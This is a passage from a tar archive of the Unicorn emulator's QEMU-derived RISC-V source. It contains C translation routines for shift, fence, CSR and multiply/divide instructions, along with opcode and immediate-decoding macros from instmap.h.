source2, source2, 0x1F); tcg_gen_shl_tl(tcg_ctx, source1, source1, source2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_srlw(DisasContext *ctx, arg_srlw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); /* clear upper 32 */ tcg_gen_ext32u_tl(tcg_ctx, source1, source1); tcg_gen_andi_tl(tcg_ctx, source2, source2, 0x1F); tcg_gen_shr_tl(tcg_ctx, source1, source1, source2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_sraw(DisasContext *ctx, arg_sraw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); 
gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); /* * first, trick to get it to act like working on 32 bits (get rid of * upper 32, sign extend to fill space) */ tcg_gen_ext32s_tl(tcg_ctx, source1, source1); tcg_gen_andi_tl(tcg_ctx, source2, source2, 0x1F); tcg_gen_sar_tl(tcg_ctx, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } #endif static bool trans_fence(DisasContext *ctx, arg_fence *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* FENCE is a full memory barrier. */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); return true; } static bool trans_fence_i(DisasContext *ctx, arg_fence_i *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (!ctx->ext_ifencei) { return false; } /* * FENCE_I is a no-op in QEMU, * however we need to end the translation block */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->pc_succ_insn); exit_tb(ctx); ctx->base.is_jmp = DISAS_NORETURN; return true; } #define RISCV_OP_CSR_PRE do {\ source1 = tcg_temp_new(tcg_ctx); \ csr_store = tcg_temp_new(tcg_ctx); \ dest = tcg_temp_new(tcg_ctx); \ rs1_pass = tcg_temp_new(tcg_ctx); \ gen_get_gpr(tcg_ctx, source1, a->rs1); \ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); \ tcg_gen_movi_tl(tcg_ctx, rs1_pass, a->rs1); \ tcg_gen_movi_tl(tcg_ctx, csr_store, a->csr); \ gen_io_start(tcg_ctx);\ } while (0) #define RISCV_OP_CSR_POST do {\ gen_set_gpr(tcg_ctx, a->rd, dest); \ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->pc_succ_insn); \ exit_tb(ctx); \ ctx->base.is_jmp = DISAS_NORETURN; \ tcg_temp_free(tcg_ctx, source1); \ tcg_temp_free(tcg_ctx, csr_store); \ tcg_temp_free(tcg_ctx, dest); \ tcg_temp_free(tcg_ctx, rs1_pass); \ } while (0) static bool trans_csrrw(DisasContext *ctx, arg_csrrw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrw(tcg_ctx, dest, tcg_ctx->cpu_env, source1, csr_store); RISCV_OP_CSR_POST; return true; } static bool trans_csrrs(DisasContext *ctx, arg_csrrs *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrs(tcg_ctx, dest, tcg_ctx->cpu_env, source1, csr_store, rs1_pass); RISCV_OP_CSR_POST; return true; } static bool trans_csrrc(DisasContext *ctx, arg_csrrc *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrc(tcg_ctx, dest, tcg_ctx->cpu_env, source1, csr_store, rs1_pass); RISCV_OP_CSR_POST; return true; } static bool trans_csrrwi(DisasContext *ctx, arg_csrrwi *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrw(tcg_ctx, dest, tcg_ctx->cpu_env, rs1_pass, csr_store); RISCV_OP_CSR_POST; return true; } static bool trans_csrrsi(DisasContext *ctx, arg_csrrsi *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrs(tcg_ctx, dest, tcg_ctx->cpu_env, rs1_pass, csr_store, rs1_pass); RISCV_OP_CSR_POST; return true; } static bool trans_csrrci(DisasContext *ctx, arg_csrrci *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrc(tcg_ctx, dest, tcg_ctx->cpu_env, rs1_pass, csr_store, rs1_pass); RISCV_OP_CSR_POST; return true; } 
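/*
 * Summary of the six CSR translations above, which all share the
 * RISCV_OP_CSR_PRE/POST shape: the register forms pass the rs1 *value*
 * (source1) to the helper, while the immediate forms pass the decoded field
 * itself (rs1_pass).  rs1_pass is also handed to the csrrs/csrrc helpers so
 * they can suppress the CSR write-back when rs1/zimm is zero, as the ISA
 * requires.  Every variant stores the old CSR value to rd and then ends the
 * translation block (exit_tb + DISAS_NORETURN), since a CSR write may
 * invalidate assumptions baked into already-translated code.
 */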
���������������������������������unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rvm.inc.c������������������������������������������0000664�0000000�0000000�00000007467�14675241067�0023712�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V translation routines for the RV64M Standard Extension. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ static bool trans_mul(DisasContext *ctx, arg_mul *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_mul_tl); } static bool trans_mulh(DisasContext *ctx, arg_mulh *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; REQUIRE_EXT(ctx, RVM); TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_muls2_tl(tcg_ctx, source2, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_mulhsu(DisasContext *ctx, arg_mulhsu *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_mulhsu); } static bool trans_mulhu(DisasContext *ctx, arg_mulhu *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; REQUIRE_EXT(ctx, RVM); TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_mulu2_tl(tcg_ctx, source2, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_div(DisasContext *ctx, arg_div *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_div); } static bool trans_divu(DisasContext *ctx, arg_divu *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_divu); } static bool trans_rem(DisasContext *ctx, arg_rem *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_rem); } static bool trans_remu(DisasContext *ctx, arg_remu *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_remu); } #ifdef TARGET_RISCV64 static bool trans_mulw(DisasContext *ctx, arg_mulw *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_mulw); } static bool trans_divw(DisasContext *ctx, arg_divw *a) { REQUIRE_EXT(ctx, 
RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith_div_w(tcg_ctx, a, &gen_div); } static bool trans_divuw(DisasContext *ctx, arg_divuw *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith_div_uw(tcg_ctx, a, &gen_divu); } static bool trans_remw(DisasContext *ctx, arg_remw *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith_div_w(tcg_ctx, a, &gen_rem); } static bool trans_remuw(DisasContext *ctx, arg_remuw *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith_div_uw(tcg_ctx, a, &gen_remu); } #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/instmap.h�����������������������������������������������������������0000664�0000000�0000000�00000037074�14675241067�0020426�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V emulation for qemu: Instruction decode helpers * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. 
*/ #ifndef TARGET_RISCV_INSTMAP_H #define TARGET_RISCV_INSTMAP_H #define MASK_OP_MAJOR(op) (op & 0x7F) enum { /* rv32i, rv64i, rv32m */ OPC_RISC_LUI = (0x37), OPC_RISC_AUIPC = (0x17), OPC_RISC_JAL = (0x6F), OPC_RISC_JALR = (0x67), OPC_RISC_BRANCH = (0x63), OPC_RISC_LOAD = (0x03), OPC_RISC_STORE = (0x23), OPC_RISC_ARITH_IMM = (0x13), OPC_RISC_ARITH = (0x33), OPC_RISC_FENCE = (0x0F), OPC_RISC_SYSTEM = (0x73), /* rv64i, rv64m */ OPC_RISC_ARITH_IMM_W = (0x1B), OPC_RISC_ARITH_W = (0x3B), /* rv32a, rv64a */ OPC_RISC_ATOMIC = (0x2F), /* floating point */ OPC_RISC_FP_LOAD = (0x7), OPC_RISC_FP_STORE = (0x27), OPC_RISC_FMADD = (0x43), OPC_RISC_FMSUB = (0x47), OPC_RISC_FNMSUB = (0x4B), OPC_RISC_FNMADD = (0x4F), OPC_RISC_FP_ARITH = (0x53), }; #define MASK_OP_ARITH(op) (MASK_OP_MAJOR(op) | (op & ((0x7 << 12) | \ (0x7F << 25)))) enum { OPC_RISC_ADD = OPC_RISC_ARITH | (0x0 << 12) | (0x00 << 25), OPC_RISC_SUB = OPC_RISC_ARITH | (0x0 << 12) | (0x20 << 25), OPC_RISC_SLL = OPC_RISC_ARITH | (0x1 << 12) | (0x00 << 25), OPC_RISC_SLT = OPC_RISC_ARITH | (0x2 << 12) | (0x00 << 25), OPC_RISC_SLTU = OPC_RISC_ARITH | (0x3 << 12) | (0x00 << 25), OPC_RISC_XOR = OPC_RISC_ARITH | (0x4 << 12) | (0x00 << 25), OPC_RISC_SRL = OPC_RISC_ARITH | (0x5 << 12) | (0x00 << 25), OPC_RISC_SRA = OPC_RISC_ARITH | (0x5 << 12) | (0x20 << 25), OPC_RISC_OR = OPC_RISC_ARITH | (0x6 << 12) | (0x00 << 25), OPC_RISC_AND = OPC_RISC_ARITH | (0x7 << 12) | (0x00 << 25), /* RV64M */ OPC_RISC_MUL = OPC_RISC_ARITH | (0x0 << 12) | (0x01 << 25), OPC_RISC_MULH = OPC_RISC_ARITH | (0x1 << 12) | (0x01 << 25), OPC_RISC_MULHSU = OPC_RISC_ARITH | (0x2 << 12) | (0x01 << 25), OPC_RISC_MULHU = OPC_RISC_ARITH | (0x3 << 12) | (0x01 << 25), OPC_RISC_DIV = OPC_RISC_ARITH | (0x4 << 12) | (0x01 << 25), OPC_RISC_DIVU = OPC_RISC_ARITH | (0x5 << 12) | (0x01 << 25), OPC_RISC_REM = OPC_RISC_ARITH | (0x6 << 12) | (0x01 << 25), OPC_RISC_REMU = OPC_RISC_ARITH | (0x7 << 12) | (0x01 << 25), }; #define MASK_OP_ARITH_IMM(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_ADDI = OPC_RISC_ARITH_IMM | (0x0 << 12), OPC_RISC_SLTI = OPC_RISC_ARITH_IMM | (0x2 << 12), OPC_RISC_SLTIU = OPC_RISC_ARITH_IMM | (0x3 << 12), OPC_RISC_XORI = OPC_RISC_ARITH_IMM | (0x4 << 12), OPC_RISC_ORI = OPC_RISC_ARITH_IMM | (0x6 << 12), OPC_RISC_ANDI = OPC_RISC_ARITH_IMM | (0x7 << 12), OPC_RISC_SLLI = OPC_RISC_ARITH_IMM | (0x1 << 12), /* additional part of IMM */ OPC_RISC_SHIFT_RIGHT_I = OPC_RISC_ARITH_IMM | (0x5 << 12) /* SRAI, SRLI */ }; #define MASK_OP_BRANCH(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_BEQ = OPC_RISC_BRANCH | (0x0 << 12), OPC_RISC_BNE = OPC_RISC_BRANCH | (0x1 << 12), OPC_RISC_BLT = OPC_RISC_BRANCH | (0x4 << 12), OPC_RISC_BGE = OPC_RISC_BRANCH | (0x5 << 12), OPC_RISC_BLTU = OPC_RISC_BRANCH | (0x6 << 12), OPC_RISC_BGEU = OPC_RISC_BRANCH | (0x7 << 12) }; enum { OPC_RISC_ADDIW = OPC_RISC_ARITH_IMM_W | (0x0 << 12), OPC_RISC_SLLIW = OPC_RISC_ARITH_IMM_W | (0x1 << 12), /* additional part of IMM */ OPC_RISC_SHIFT_RIGHT_IW = OPC_RISC_ARITH_IMM_W | (0x5 << 12) /* SRAI, SRLI */ }; enum { OPC_RISC_ADDW = OPC_RISC_ARITH_W | (0x0 << 12) | (0x00 << 25), OPC_RISC_SUBW = OPC_RISC_ARITH_W | (0x0 << 12) | (0x20 << 25), OPC_RISC_SLLW = OPC_RISC_ARITH_W | (0x1 << 12) | (0x00 << 25), OPC_RISC_SRLW = OPC_RISC_ARITH_W | (0x5 << 12) | (0x00 << 25), OPC_RISC_SRAW = OPC_RISC_ARITH_W | (0x5 << 12) | (0x20 << 25), /* RV64M */ OPC_RISC_MULW = OPC_RISC_ARITH_W | (0x0 << 12) | (0x01 << 25), OPC_RISC_DIVW = OPC_RISC_ARITH_W | (0x4 << 12) | (0x01 << 25), OPC_RISC_DIVUW = OPC_RISC_ARITH_W | (0x5 << 
12) | (0x01 << 25), OPC_RISC_REMW = OPC_RISC_ARITH_W | (0x6 << 12) | (0x01 << 25), OPC_RISC_REMUW = OPC_RISC_ARITH_W | (0x7 << 12) | (0x01 << 25), }; #define MASK_OP_LOAD(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_LB = OPC_RISC_LOAD | (0x0 << 12), OPC_RISC_LH = OPC_RISC_LOAD | (0x1 << 12), OPC_RISC_LW = OPC_RISC_LOAD | (0x2 << 12), OPC_RISC_LD = OPC_RISC_LOAD | (0x3 << 12), OPC_RISC_LBU = OPC_RISC_LOAD | (0x4 << 12), OPC_RISC_LHU = OPC_RISC_LOAD | (0x5 << 12), OPC_RISC_LWU = OPC_RISC_LOAD | (0x6 << 12), }; #define MASK_OP_STORE(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_SB = OPC_RISC_STORE | (0x0 << 12), OPC_RISC_SH = OPC_RISC_STORE | (0x1 << 12), OPC_RISC_SW = OPC_RISC_STORE | (0x2 << 12), OPC_RISC_SD = OPC_RISC_STORE | (0x3 << 12), }; #define MASK_OP_JALR(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) /* no enum since OPC_RISC_JALR is the actual value */ #define MASK_OP_ATOMIC(op) \ (MASK_OP_MAJOR(op) | (op & ((0x7 << 12) | (0x7F << 25)))) #define MASK_OP_ATOMIC_NO_AQ_RL_SZ(op) \ (MASK_OP_MAJOR(op) | (op & (0x1F << 27))) enum { OPC_RISC_LR = OPC_RISC_ATOMIC | (0x02 << 27), OPC_RISC_SC = OPC_RISC_ATOMIC | (0x03 << 27), OPC_RISC_AMOSWAP = OPC_RISC_ATOMIC | (0x01 << 27), OPC_RISC_AMOADD = OPC_RISC_ATOMIC | (0x00 << 27), OPC_RISC_AMOXOR = OPC_RISC_ATOMIC | (0x04 << 27), OPC_RISC_AMOAND = OPC_RISC_ATOMIC | (0x0C << 27), OPC_RISC_AMOOR = OPC_RISC_ATOMIC | (0x08 << 27), OPC_RISC_AMOMIN = OPC_RISC_ATOMIC | (0x10 << 27), OPC_RISC_AMOMAX = OPC_RISC_ATOMIC | (0x14 << 27), OPC_RISC_AMOMINU = OPC_RISC_ATOMIC | (0x18 << 27), OPC_RISC_AMOMAXU = OPC_RISC_ATOMIC | (0x1C << 27), }; #define MASK_OP_SYSTEM(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_ECALL = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_EBREAK = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_ERET = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_MRTS = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_MRTH = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_HRTS = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_WFI = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_SFENCEVM = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_CSRRW = OPC_RISC_SYSTEM | (0x1 << 12), OPC_RISC_CSRRS = OPC_RISC_SYSTEM | (0x2 << 12), OPC_RISC_CSRRC = OPC_RISC_SYSTEM | (0x3 << 12), OPC_RISC_CSRRWI = OPC_RISC_SYSTEM | (0x5 << 12), OPC_RISC_CSRRSI = OPC_RISC_SYSTEM | (0x6 << 12), OPC_RISC_CSRRCI = OPC_RISC_SYSTEM | (0x7 << 12), }; #define MASK_OP_FP_LOAD(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_FLW = OPC_RISC_FP_LOAD | (0x2 << 12), OPC_RISC_FLD = OPC_RISC_FP_LOAD | (0x3 << 12), }; #define MASK_OP_FP_STORE(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_FSW = OPC_RISC_FP_STORE | (0x2 << 12), OPC_RISC_FSD = OPC_RISC_FP_STORE | (0x3 << 12), }; #define MASK_OP_FP_FMADD(op) (MASK_OP_MAJOR(op) | (op & (0x3 << 25))) enum { OPC_RISC_FMADD_S = OPC_RISC_FMADD | (0x0 << 25), OPC_RISC_FMADD_D = OPC_RISC_FMADD | (0x1 << 25), }; #define MASK_OP_FP_FMSUB(op) (MASK_OP_MAJOR(op) | (op & (0x3 << 25))) enum { OPC_RISC_FMSUB_S = OPC_RISC_FMSUB | (0x0 << 25), OPC_RISC_FMSUB_D = OPC_RISC_FMSUB | (0x1 << 25), }; #define MASK_OP_FP_FNMADD(op) (MASK_OP_MAJOR(op) | (op & (0x3 << 25))) enum { OPC_RISC_FNMADD_S = OPC_RISC_FNMADD | (0x0 << 25), OPC_RISC_FNMADD_D = OPC_RISC_FNMADD | (0x1 << 25), }; #define MASK_OP_FP_FNMSUB(op) (MASK_OP_MAJOR(op) | (op & (0x3 << 25))) enum { OPC_RISC_FNMSUB_S = OPC_RISC_FNMSUB | (0x0 << 25), OPC_RISC_FNMSUB_D = OPC_RISC_FNMSUB | (0x1 << 25), }; #define MASK_OP_FP_ARITH(op) (MASK_OP_MAJOR(op) | (op & (0x7F << 25))) enum { /* float */ OPC_RISC_FADD_S 
= OPC_RISC_FP_ARITH | (0x0 << 25), OPC_RISC_FSUB_S = OPC_RISC_FP_ARITH | (0x4 << 25), OPC_RISC_FMUL_S = OPC_RISC_FP_ARITH | (0x8 << 25), OPC_RISC_FDIV_S = OPC_RISC_FP_ARITH | (0xC << 25), OPC_RISC_FSGNJ_S = OPC_RISC_FP_ARITH | (0x10 << 25), OPC_RISC_FSGNJN_S = OPC_RISC_FP_ARITH | (0x10 << 25), OPC_RISC_FSGNJX_S = OPC_RISC_FP_ARITH | (0x10 << 25), OPC_RISC_FMIN_S = OPC_RISC_FP_ARITH | (0x14 << 25), OPC_RISC_FMAX_S = OPC_RISC_FP_ARITH | (0x14 << 25), OPC_RISC_FSQRT_S = OPC_RISC_FP_ARITH | (0x2C << 25), OPC_RISC_FEQ_S = OPC_RISC_FP_ARITH | (0x50 << 25), OPC_RISC_FLT_S = OPC_RISC_FP_ARITH | (0x50 << 25), OPC_RISC_FLE_S = OPC_RISC_FP_ARITH | (0x50 << 25), OPC_RISC_FCVT_W_S = OPC_RISC_FP_ARITH | (0x60 << 25), OPC_RISC_FCVT_WU_S = OPC_RISC_FP_ARITH | (0x60 << 25), OPC_RISC_FCVT_L_S = OPC_RISC_FP_ARITH | (0x60 << 25), OPC_RISC_FCVT_LU_S = OPC_RISC_FP_ARITH | (0x60 << 25), OPC_RISC_FCVT_S_W = OPC_RISC_FP_ARITH | (0x68 << 25), OPC_RISC_FCVT_S_WU = OPC_RISC_FP_ARITH | (0x68 << 25), OPC_RISC_FCVT_S_L = OPC_RISC_FP_ARITH | (0x68 << 25), OPC_RISC_FCVT_S_LU = OPC_RISC_FP_ARITH | (0x68 << 25), OPC_RISC_FMV_X_S = OPC_RISC_FP_ARITH | (0x70 << 25), OPC_RISC_FCLASS_S = OPC_RISC_FP_ARITH | (0x70 << 25), OPC_RISC_FMV_S_X = OPC_RISC_FP_ARITH | (0x78 << 25), /* double */ OPC_RISC_FADD_D = OPC_RISC_FP_ARITH | (0x1 << 25), OPC_RISC_FSUB_D = OPC_RISC_FP_ARITH | (0x5 << 25), OPC_RISC_FMUL_D = OPC_RISC_FP_ARITH | (0x9 << 25), OPC_RISC_FDIV_D = OPC_RISC_FP_ARITH | (0xD << 25), OPC_RISC_FSGNJ_D = OPC_RISC_FP_ARITH | (0x11 << 25), OPC_RISC_FSGNJN_D = OPC_RISC_FP_ARITH | (0x11 << 25), OPC_RISC_FSGNJX_D = OPC_RISC_FP_ARITH | (0x11 << 25), OPC_RISC_FMIN_D = OPC_RISC_FP_ARITH | (0x15 << 25), OPC_RISC_FMAX_D = OPC_RISC_FP_ARITH | (0x15 << 25), OPC_RISC_FCVT_S_D = OPC_RISC_FP_ARITH | (0x20 << 25), OPC_RISC_FCVT_D_S = OPC_RISC_FP_ARITH | (0x21 << 25), OPC_RISC_FSQRT_D = OPC_RISC_FP_ARITH | (0x2D << 25), OPC_RISC_FEQ_D = OPC_RISC_FP_ARITH | (0x51 << 25), OPC_RISC_FLT_D = OPC_RISC_FP_ARITH | (0x51 << 25), OPC_RISC_FLE_D = OPC_RISC_FP_ARITH | (0x51 << 25), OPC_RISC_FCVT_W_D = OPC_RISC_FP_ARITH | (0x61 << 25), OPC_RISC_FCVT_WU_D = OPC_RISC_FP_ARITH | (0x61 << 25), OPC_RISC_FCVT_L_D = OPC_RISC_FP_ARITH | (0x61 << 25), OPC_RISC_FCVT_LU_D = OPC_RISC_FP_ARITH | (0x61 << 25), OPC_RISC_FCVT_D_W = OPC_RISC_FP_ARITH | (0x69 << 25), OPC_RISC_FCVT_D_WU = OPC_RISC_FP_ARITH | (0x69 << 25), OPC_RISC_FCVT_D_L = OPC_RISC_FP_ARITH | (0x69 << 25), OPC_RISC_FCVT_D_LU = OPC_RISC_FP_ARITH | (0x69 << 25), OPC_RISC_FMV_X_D = OPC_RISC_FP_ARITH | (0x71 << 25), OPC_RISC_FCLASS_D = OPC_RISC_FP_ARITH | (0x71 << 25), OPC_RISC_FMV_D_X = OPC_RISC_FP_ARITH | (0x79 << 25), }; #define GET_B_IMM(inst) ((extract32(inst, 8, 4) << 1) \ | (extract32(inst, 25, 6) << 5) \ | (extract32(inst, 7, 1) << 11) \ | (sextract64(inst, 31, 1) << 12)) #define GET_STORE_IMM(inst) ((extract32(inst, 7, 5)) \ | (sextract64(inst, 25, 7) << 5)) #define GET_JAL_IMM(inst) ((extract32(inst, 21, 10) << 1) \ | (extract32(inst, 20, 1) << 11) \ | (extract32(inst, 12, 8) << 12) \ | (sextract64(inst, 31, 1) << 20)) #define GET_RM(inst) extract32(inst, 12, 3) #define GET_RS3(inst) extract32(inst, 27, 5) #define GET_RS1(inst) extract32(inst, 15, 5) #define GET_RS2(inst) extract32(inst, 20, 5) #define GET_RD(inst) extract32(inst, 7, 5) #define GET_IMM(inst) sextract64(inst, 20, 12) /* RVC decoding macros */ #define GET_C_IMM(inst) (extract32(inst, 2, 5) \ | (sextract64(inst, 12, 1) << 5)) #define GET_C_ZIMM(inst) (extract32(inst, 2, 5) \ | (extract32(inst, 12, 1) << 5)) #define 
GET_C_ADDI4SPN_IMM(inst) ((extract32(inst, 6, 1) << 2) \ | (extract32(inst, 5, 1) << 3) \ | (extract32(inst, 11, 2) << 4) \ | (extract32(inst, 7, 4) << 6)) #define GET_C_ADDI16SP_IMM(inst) ((extract32(inst, 6, 1) << 4) \ | (extract32(inst, 2, 1) << 5) \ | (extract32(inst, 5, 1) << 6) \ | (extract32(inst, 3, 2) << 7) \ | (sextract64(inst, 12, 1) << 9)) #define GET_C_LWSP_IMM(inst) ((extract32(inst, 4, 3) << 2) \ | (extract32(inst, 12, 1) << 5) \ | (extract32(inst, 2, 2) << 6)) #define GET_C_LDSP_IMM(inst) ((extract32(inst, 5, 2) << 3) \ | (extract32(inst, 12, 1) << 5) \ | (extract32(inst, 2, 3) << 6)) #define GET_C_SWSP_IMM(inst) ((extract32(inst, 9, 4) << 2) \ | (extract32(inst, 7, 2) << 6)) #define GET_C_SDSP_IMM(inst) ((extract32(inst, 10, 3) << 3) \ | (extract32(inst, 7, 3) << 6)) #define GET_C_LW_IMM(inst) ((extract32(inst, 6, 1) << 2) \ | (extract32(inst, 10, 3) << 3) \ | (extract32(inst, 5, 1) << 6)) #define GET_C_LD_IMM(inst) ((extract16(inst, 10, 3) << 3) \ | (extract16(inst, 5, 2) << 6)) #define GET_C_J_IMM(inst) ((extract32(inst, 3, 3) << 1) \ | (extract32(inst, 11, 1) << 4) \ | (extract32(inst, 2, 1) << 5) \ | (extract32(inst, 7, 1) << 6) \ | (extract32(inst, 6, 1) << 7) \ | (extract32(inst, 9, 2) << 8) \ | (extract32(inst, 8, 1) << 10) \ | (sextract64(inst, 12, 1) << 11)) #define GET_C_B_IMM(inst) ((extract32(inst, 3, 2) << 1) \ | (extract32(inst, 10, 2) << 3) \ | (extract32(inst, 2, 1) << 5) \ | (extract32(inst, 5, 2) << 6) \ | (sextract64(inst, 12, 1) << 8)) #define GET_C_SIMM3(inst) extract32(inst, 10, 3) #define GET_C_RD(inst) GET_RD(inst) #define GET_C_RS1(inst) GET_RD(inst) #define GET_C_RS2(inst) extract32(inst, 2, 5) #define GET_C_RS1S(inst) (8 + extract16(inst, 7, 3)) #define GET_C_RS2S(inst) (8 + extract16(inst, 2, 3)) #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/op_helper.c���������������������������������������������������������0000664�0000000�0000000�00000015113�14675241067�0020711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V Emulation Helpers for QEMU. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2017-2018 SiFive, Inc. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General 